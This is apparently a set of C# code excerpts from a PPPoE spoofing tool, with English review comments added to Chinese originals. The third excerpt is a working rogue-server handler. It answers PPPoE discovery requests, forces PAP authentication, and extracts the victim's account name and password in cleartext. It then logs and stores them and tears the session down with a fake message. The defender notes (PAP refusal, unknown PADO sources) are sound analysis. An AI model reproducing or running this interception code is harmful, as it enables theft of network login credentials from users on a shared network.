Ejemplo n.º 1
 //Get the data of the tag titled Host-Uniq (host unique identifier)
 // Extracts the value of the Host-Uniq tag from a captured PPPoE discovery packet.
 //
 // The packet is searched for the byte sequence 01 01 00 00 01 03. In PPPoE
 // (RFC 2516) tag type 0x0101 is Service-Name and 0x0103 is Host-Uniq, so this
 // marker is an empty Service-Name tag followed directly by the Host-Uniq tag
 // type; a packet whose tags are laid out differently does not match and
 // yields null.
 //
 // pac:     raw bytes of the captured frame.
 // returns: the tag value bytes, or null when the marker is absent or any
 //          step throws.
 //
 // NOTE(review): the tag length is read from the packet and is not compared
 // with pac.Length in this method; an out-of-range length presumably surfaces
 // as an exception inside sup.byteSub and is swallowed by the catch-all below.
 public byte[] getData_HostUniq(byte[] pac)
 {
     try
     {
         byte[] marker    = sup.toByte(new String[] { "01", "01", "00", "00", "01", "03" });
         int    markerPos = sup.byteIndexOf(pac, marker);
         if (markerPos != -1)
         {
             // The two bytes right after the marker hold the tag length, high byte first.
             int    lengthPos   = markerPos + marker.Length;
             byte[] lengthField = sup.byteSub(pac, lengthPos, 2);
             int    valueLength = (lengthField[0] * 256) + lengthField[1];

             // The tag value starts immediately after the length field.
             return sup.byteSub(pac, lengthPos + 2, valueLength);
         }

         // Marker not found in this packet.
         return null;
     }
     catch
     {
         // Every exception type ends up here and is reported with the same generic message.
         Console.WriteLine("getData_HostUniq() : 未知错误");
         return null;
     }
 }
Ejemplo n.º 2
        //Build the 8864 packet whose PPP_Data block is user-defined
        // Assembles a PPPoE session-stage (EtherType 0x8864) frame around the
        // caller-supplied PPP_allData payload.
        //
        // Byte order of the result, as concatenated below:
        //   distinationMac | sourceMac | 88 64 | 11 | 00 | sessionID | 2-byte length | PPP_allData
        // (0x11 is the PPPoE version/type byte and 0x00 the session-data code in RFC 2516.)
        //
        // Side effects: overwrites the versions, packetType, sessionData and
        // payloadLength members and calls sortPayloadAnInfo().
        //
        // returns: the assembled frame, or null (after printing a message) when
        //          any of distinationMac, sourceMac, sessionID or PPP_allData is unset.
        //
        // NOTE(review): the lengths of the MAC and session-ID arrays are not checked
        // here, and a payload longer than 65535 bytes would have its length truncated
        // by the byte casts.
        public byte[] getAllPacketData_custom()
        {
            bool allFieldsSet = distinationMac != null && sourceMac != null && sessionID != null && PPP_allData != null;
            if (!allFieldsSet)
            {
                Console.WriteLine("需要构造的自定义PPP_X的数据包的参数还没有赋值完");
                return null;
            }

            // Per the original author's comment: sorts the List<byte[]> and, as a
            // by-product, stores the sorted result in the PPPLCP_optionsData array.
            sortPayloadAnInfo();

            byte[] macPair = sup.byteAppent(distinationMac, sourceMac);

            versions   = sup.toByte(new string[] { "11" });       // PPPoE version/type is always set to 0x11
            packetType = sup.toByte(new string[] { "88", "64" }); // EtherType is always set to 0x8864
            byte[] typeAndVersion = sup.byteAppent(packetType, versions);

            sessionData = sup.toByte(new string[] { "00" });      // code byte is always set to 0x00
            byte[] codeAndSession = sup.byteAppent(sessionData, sessionID);

            // Two-byte payload length, high byte first.
            int payloadSize = PPP_allData.Length;
            payloadLength = new byte[] { (byte)(payloadSize / 256), (byte)(payloadSize % 256) };

            byte[] lengthAndPayload = sup.byteAppent(payloadLength, PPP_allData);
            byte[] frameHead        = sup.byteAppent(macPair, typeAndVersion);
            byte[] frameTail        = sup.byteAppent(codeAndSession, lengthAndPayload);

            return sup.byteAppent(frameHead, frameTail);
        }
Ejemplo n.º 3
        //Handler function for catchPacketFun()
        //It handles packets by PPPoE spoofing
        //note(maybe): the packet object is the captured packet (a single packet)
        // Per-packet capture callback. It inspects the EtherType of each captured
        // frame and, for PPPoE discovery (0x8863) and session (0x8864) frames,
        // builds and sends replies through sendPacket() using selfMac as source.
        //
        // What the visible code does, in order of the branches below:
        //   * PADI (code 0x09)  -> replies with code 7 (0x07, PADO in RFC 2516).
        //   * PADR (code 0x19)  -> replies with code 101 (0x65, PADS).
        //   * PPP protocol C0 23 (PAP) with code 1 -> reads two length-prefixed
        //     fields from the PAP payload, logs and stores them in netAcc/netPwd,
        //     sets colseNetAdapte, sends a PAP code-3 reply carrying a message,
        //     then sends a discovery frame with code 167 (0xA7, PADT).
        //   * LCP request (config byte 1) addressed to selfMac -> echoes the
        //     options back with code 2, then sends its own request with option
        //     03 04 c0 23.
        //
        // Review notes for defenders:
        //   * On the wire this looks like a host answering every PADI with a PADO
        //     and then requesting PAP authentication. PADO/PADS frames from a MAC
        //     that is not a known access concentrator are the observable signal.
        //   * PAP transmits the password unencrypted, which is what makes the
        //     Authenticate-Request readable here. A client configured to refuse
        //     PAP does not send its password in this form.
        //   * None of the fixed offsets (Data[12], Data[13], pac[22], pac[23]) nor
        //     the length bytes taken from the PAP payload are bounds-checked in
        //     this method, and no try/catch is visible around them.
        //
        // sender: capture device raising the event (unused here).
        // packet: event args; packet.Packet.Data is the raw frame.
        private void device_OnPacketArrival(object sender, CaptureEventArgs packet)
        {
            // Bytes 12-13 of an untagged Ethernet frame are the EtherType; 136 == 0x88.
            if (packet.Packet.Data[12] == 136)
            {
                if (packet.Packet.Data[13] == 99)        //filter out non-PPPoE frames; this is the 8863 (discovery) case, 99 == 0x63
                {
                    byte[]       pac   = packet.Packet.Data;
                    protocol8863 p8863 = new protocol8863();
                    support      sup   = new support();
                    switch (p8863.getDiscoveryStage(pac)[0])
                    {
                    //PADI 0x09
                    case 9:
                        // Reply is addressed to the sender of the PADI, with selfMac as source.
                        p8863.setDistinationMac(sup.getSourceMac(pac));
                        p8863.setSourceMac(selfMac);
                        p8863.setDiscoveryStage(new byte[] { 7 });    // 0x07 is the PADO code in RFC 2516
                        p8863.setSessionID(p8863.getSessionID(pac));
                        // Host-Uniq from the request is copied into the reply; getData_HostUniq may return null.
                        p8863.setData_HostUniq(p8863.getData_HostUniq(pac));
                        // Tag bytes: type 01 02, length 00 08, value ASCII "PPPOESRV" (0x0102 is AC-Name in RFC 2516).
                        p8863.setData_other(sup.toByte(new string[] { "01", "02", "00", "08", "50", "50", "50", "4f", "45", "53", "52", "56" }));       //PPPOESRV
                        sendPacket(p8863.getAllPacketData());
                        // Log text reads "PPPoE protocol exchange in progress...".
                        log.writeLog("正在进行PPPOE协议交互...", log.msgType.info);
                        return;

                    //PADR 0x19
                    case 25:
                        p8863.setDistinationMac(sup.getSourceMac(pac));
                        p8863.setSourceMac(selfMac);
                        p8863.setDiscoveryStage(new byte[] { 101 });    // 101 == 0x65, the PADS code in RFC 2516
                        byte[] sessionID = p8863.getSessionID(pac);
                        // Second byte of the session ID taken from the PADR is incremented.
                        // NOTE(review): whether getSessionID returns a copy or a view into pac is not visible here.
                        sessionID[1]++;
                        p8863.setSessionID(sessionID);
                        p8863.setData_HostUniq(p8863.getData_HostUniq(pac));
                        sendPacket(p8863.getAllPacketData());
                        return;
                    }
                }

                if (packet.Packet.Data[13] == 100)       //filter out non-PPPoE frames; this is the 8864 (session) case, 100 == 0x64
                {
                    byte[]       pac   = packet.Packet.Data;
                    protocol8864 p8864 = new protocol8864();
                    support      sup   = new support();
                    if (p8864.getPPP(pac)[0] == 192 && p8864.getPPP(pac)[1] == 35) //if the PPP protocol is PAP (192, 35 == 0xC0 0x23)
                    {
                        // Region below: the approach currently in use, which ends the connection with a "691" message.
                        #region                                                    //目前的方式,使用 691 Message 终结连接
                        // Offset 22 is presumably the PAP code byte (14-byte Ethernet header + 6-byte PPPoE header
                        // + 2-byte PPP protocol field, assuming an untagged frame) - TODO confirm.
                        if (pac[22] == (byte)1)                                    //if this is a PAP request packet
                        {
                            //Console.WriteLine("终结包(691 message packet)已发送");
                            byte[] papContent = p8864.getPPPLCP_optionsData(pac);   //get the PAP content
                            // papContent is read as: [len1][len1 bytes][len2][len2 bytes].
                            // NOTE(review): len1 and len2 come from the peer and are not checked against papContent.Length.
                            byte[] papNetAcc  = sup.byteSub(papContent, 1, papContent[0]);
                            byte[] papNetPwd  = sup.byteSub(papContent, papContent[0] + 2, papContent[papContent[0] + 1]);
                            // NOTE(review): both fields, including the password, are written to the log in cleartext.
                            log.writeLog($"PPPOE 欺骗模块\n截取到账号: {Encoding.Default.GetString(papNetAcc)}\n截取到密码:{Encoding.Default.GetString(papNetPwd)}", log.msgType.info);
                            netAcc         = Encoding.Default.GetString(papNetAcc); //store the captured account in the class member
                            netPwd         = Encoding.Default.GetString(papNetPwd); //store the captured password in the class member
                            colseNetAdapte = true;                                  //stop capturing packets

                            //691 Msg
                            // Message text tells the user the interception succeeded, that it is not an error,
                            // that Netkeeper can now be closed, and to watch for nkshare's prompt.
                            String       msg691      = "\r\n拦截成功,这并非错误提示。\r\n\r\n你现在可以关闭Netkeeper\r\n\r\n并注意nkshare的提示##Error";
                            byte[]       msg691Bytes = Encoding.GetEncoding("GB2312").GetBytes(msg691);
                            protocol8864 p8864Show   = new protocol8864();
                            p8864Show.setDistinationMac(sup.getSourceMac(pac));
                            p8864Show.setSourceMac(selfMac);
                            p8864Show.setSessionID(p8864Show.getSessionID(pac));
                            // One-byte message length followed by the message; the cast truncates lengths above 255.
                            byte[] msg691BytesPac  = sup.byteAppent(new byte[] { (byte)msg691Bytes.Length }, msg691Bytes);
                            // PPP protocol C0 23, PAP code 3, then pac[23] after an in-place pre-increment
                            // (this mutates the captured buffer), then a two-byte length, high byte first.
                            byte[] papCodeBytesPac = sup.byteAppent(new byte[] { 192, 35, 3, ++pac[23] }, new byte[] { (byte)((msg691BytesPac.Length + 4) / 256), (byte)((msg691BytesPac.Length + 4) % 256) });
                            byte[] papAll          = sup.byteAppent(papCodeBytesPac, msg691BytesPac);
                            p8864Show.setPPP_allData(papAll);
                            sendPacket(p8864Show.getAllPacketData_custom());
                            //691 Msg
                            // Discovery frame with code 167, sent with the captured frame's destination MAC as its source.
                            protocol8863 p8863 = new protocol8863();
                            p8863.setDistinationMac(sup.getSourceMac(pac));
                            p8863.setSourceMac(sup.getDistinationMac(pac));
                            p8863.setDiscoveryStage(new byte[] { 167 });    //PADT (terminate) packet, 167 == 0xA7
                            p8863.setSessionID(p8863.getSessionID(pac));
                            p8863.setData_other(null);
                            sendPacket(p8863.getAllPacketData());
                            return;
                        }
                        #endregion

                        // Region below: the original approach (send the terminate packet directly), kept commented out.
                        #region //原来直接方式终结包
                        //protocol8863 p8863 = new protocol8863();
                        //p8863.setDistinationMac(sup.getSourceMac(pac));
                        //p8863.setSourceMac(sup.getDistinationMac(pac));
                        //p8863.setDiscoveryStage(new byte[] { 167 });    //PADT (terminate) packet
                        //p8863.setSessionID(p8863.getSessionID(pac));
                        //p8863.setData_other(null);
                        //sendPacket(p8863.getAllPacketData());
                        //Console.WriteLine("终结包已发送");
                        //byte[] papContent = p8864.getPPPLCP_optionsData(pac);   //get the PAP content
                        //byte[] papNetAcc = sup.byteSub(papContent, 1, papContent[0]);
                        //byte[] papNetPwd = sup.byteSub(papContent, papContent[0] + 2, papContent[papContent[0] + 1]);
                        //log.writeLog($"PPPOE 欺骗模块\n截取到账号: {Encoding.Default.GetString(papNetAcc)}\n截取到密码:{Encoding.Default.GetString(papNetPwd)}",log.msgType.info);
                        //netAcc = Encoding.Default.GetString(papNetAcc);     //store the captured account in the class member
                        //netPwd = Encoding.Default.GetString(papNetPwd);     //store the captured password in the class member
                        //colseNetAdapte = true;                              //stop capturing packets
                        #endregion
                    }


                    if (sup.equalsByte(sup.getDistinationMac(pac), selfMac) && p8864.getPPPLCP_config(pac)[0] == 1)  //if the client is sending a Request to this machine (PPP-LCP, although that default condition is not actually checked)
                    {
                        // First reply: same PPP protocol, identifier and options as the request, with code 2.
                        p8864.setDistinationMac(sup.getSourceMac(pac));
                        p8864.setSourceMac(selfMac);
                        p8864.setSessionID(p8864.getSessionID(pac));
                        p8864.setPPP(p8864.getPPP(pac));
                        p8864.setPPPLCP_config(new byte[] { 2 });   //ACK
                        p8864.setPPPLCP_identifier(p8864.getPPPLCP_identifier(pac));

                        byte[] optionDataModif = p8864.getPPPLCP_optionsData(pac);
                        p8864.setPPPLCP_optionsData(optionDataModif);    //slightly redundant
                        sendPacket(p8864.getAllPacketData_PPPLCP());

                        // Second packet: a fresh request from this side with identifier 1.
                        p8864 = new protocol8864();
                        p8864.setDistinationMac(sup.getSourceMac(pac));
                        p8864.setSourceMac(selfMac);
                        p8864.setSessionID(p8864.getSessionID(pac));
                        p8864.setPPP(p8864.getPPP(pac));
                        p8864.setPPPLCP_config(new byte[] { 1 });   //Req

                        p8864.setPPPLCP_identifier(new byte[] { 1 });
                        // Option bytes 03 04 c0 23: LCP Authentication-Protocol option (type 3, length 4) with value
                        // 0xC023, i.e. PAP. A peer that accepts this will send its password unencrypted.
                        p8864.setPPPLCP_optionsData(sup.toByte(new string[] { "03", "04", "c0", "23", }));
                        sendPacket(p8864.getAllPacketData_PPPLCP());
                        return;
                    }
                }
            }
        }